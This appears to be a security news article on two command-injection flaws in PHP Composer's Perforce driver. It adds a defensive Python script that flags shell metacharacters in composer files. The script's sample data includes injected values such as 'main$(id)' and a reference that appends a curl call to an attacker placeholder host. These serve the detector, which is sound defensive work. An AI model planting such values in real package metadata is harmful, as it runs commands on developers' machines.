New PHP Composer Flaws Allow Arbitrary Command Execution — Patches Launched

Two high-severity security vulnerabilities have been disclosed in Composer, the package manager for PHP, that, if successfully exploited, could lead to arbitrary command execution.

The vulnerabilities are described as command injection flaws affecting Composer's Perforce VCS (version control software) driver. Details of the two flaws are below –

  • CVE-2026-40176 (CVSS score: 7.8) – An improper input validation vulnerability that could allow an attacker who controls a repository configuration, via a malicious composer.json declaring a Perforce VCS repository, to inject arbitrary commands, resulting in command execution in the context of the user running Composer.
  • CVE-2026-40261 (CVSS score: 8.8) – An improper input validation vulnerability stemming from insufficient escaping that could allow an attacker to inject arbitrary commands through a crafted source reference containing shell metacharacters.

In both cases, Composer would execute the injected commands even when the Perforce client itself is not installed, the maintainers noted in an advisory.

The vulnerabilities affect the following versions –

  • >= 2.3, < 2.9.6 (fixed in version 2.9.6)
  • >= 2.0, < 2.2.27 (fixed in version 2.2.27)

If immediate patching is not an option, it is recommended to inspect composer.json files before running Composer and verify that Perforce-related fields contain only valid values. It is also recommended to use only trusted Composer repositories, to run Composer commands only on projects from trusted sources, and to avoid installing dependencies using the "--prefer-dist" flag or the "preferred-install: dist" configuration setting.
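The pre-run inspection suggested above can be scripted. The following is an added example, not code from the Composer project or its advisory: it walks the `repositories` section of a composer.json and the `source` entries of a composer.lock, and flags any Perforce-typed entry whose fields carry shell metacharacters, so a reviewer can look at those values before Composer ever runs. The field names checked (`url`, `depot`, `branch`, `p4user`, `p4password`, `reference`), the metacharacter set, and the sample documents are assumptions made for the example; confirm the key names against the Composer documentation for your version.

```python
"""Audit composer.json / composer.lock for suspicious Perforce repository values.

Added example for the mitigation described in the article; not Composer's own
code. It flags values for manual review, it does not prove they are safe.
"""
import json
import re

# Characters a POSIX shell would interpret if an unescaped value reached a
# command line. Assumption: a review-oriented set, not taken from the advisory.
SHELL_META = re.compile(r"[;&|`$<>(){}\n\r\\'\"]")

# Keys a "perforce" repository entry may carry in composer.json. Assumed set;
# verify against the Composer docs for the version in use.
PERFORCE_KEYS = ("url", "depot", "branch", "p4user", "p4password")


def suspicious_value(value):
    """True if value is a string containing a shell metacharacter."""
    return isinstance(value, str) and SHELL_META.search(value) is not None


def audit_repositories(composer_json):
    """Return (where, key, value) findings for perforce repos in composer.json."""
    findings = []
    repos = composer_json.get("repositories", [])
    # Composer accepts either a list or a name-keyed object here.
    if isinstance(repos, dict):
        repos = list(repos.values())
    for repo in repos:
        if not isinstance(repo, dict) or repo.get("type") != "perforce":
            continue
        for key in PERFORCE_KEYS:
            if suspicious_value(repo.get(key)):
                findings.append(("composer.json", key, repo[key]))
    return findings


def audit_lock(composer_lock):
    """Return (package, key, value) findings for perforce source entries in composer.lock."""
    findings = []
    for section in ("packages", "packages-dev"):
        for pkg in composer_lock.get(section, []):
            src = pkg.get("source") or {}
            if src.get("type") != "perforce":
                continue
            for key in ("url", "reference"):
                if suspicious_value(src.get(key)):
                    findings.append((pkg.get("name", "?"), key, src[key]))
    return findings


def audit(composer_json, composer_lock=None):
    """Combine both audits; an empty list means nothing was flagged."""
    findings = audit_repositories(composer_json)
    if composer_lock is not None:
        findings += audit_lock(composer_lock)
    return findings


def audit_files(json_path, lock_path=None):
    """Load the files from disk and run audit() on them."""
    with open(json_path, encoding="utf-8") as fh:
        composer_json = json.load(fh)
    composer_lock = None
    if lock_path is not None:
        with open(lock_path, encoding="utf-8") as fh:
            composer_lock = json.load(fh)
    return audit(composer_json, composer_lock)


# Constructed sample input: one clean perforce repo, one with an injected branch,
# and a non-perforce repo that must be ignored.
SAMPLE_JSON = {
    "name": "acme/app",
    "repositories": [
        {"type": "perforce", "url": "perforce.example.internal:1666",
         "depot": "//depot/lib", "branch": "main"},
        {"type": "perforce", "url": "perforce.example.internal:1666",
         "depot": "//depot/app", "branch": "main$(id)"},
        {"type": "vcs", "url": "https://example.invalid/repo.git"},
    ],
}

# Constructed sample lock: a perforce source with a crafted reference, a clean
# perforce source, and a git source whose reference must not be reported.
SAMPLE_LOCK = {
    "packages": [
        {"name": "example/lib", "source": {"type": "perforce",
         "url": "p4.example.internal:1666",
         "reference": "42; curl http://attacker.example/"}},
        {"name": "example/clean", "source": {"type": "perforce",
         "url": "p4.example.internal:1666", "reference": "57"}},
        {"name": "vendor/git-pkg", "source": {"type": "git",
         "url": "https://example.invalid/x.git", "reference": "abc;def"}},
    ],
    "packages-dev": [],
}

if __name__ == "__main__":
    for where, key, value in audit(SAMPLE_JSON, SAMPLE_LOCK):
        print(f"REVIEW {where}: {key} = {value!r}")
```

Run `audit_files("composer.json", "composer.lock")` from a wrapper in CI or a pre-commit hook and fail the job on a non-empty result; the output is a list of values for a human to examine, since legitimate Perforce depot paths and usernames rarely need any of the characters in `SHELL_META`.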

Composer said it scanned Packagist.org and found no evidence of the vulnerabilities being exploited by threat actors through packages published with malicious Perforce information. A new release is expected to be shipped for Private Packagist Self-Hosted customers.

"As a precaution, publication of Perforce source metadata has been disabled on Packagist.org since Friday, April 10th, 2026," it said. "Composer installations should be updated immediately regardless."
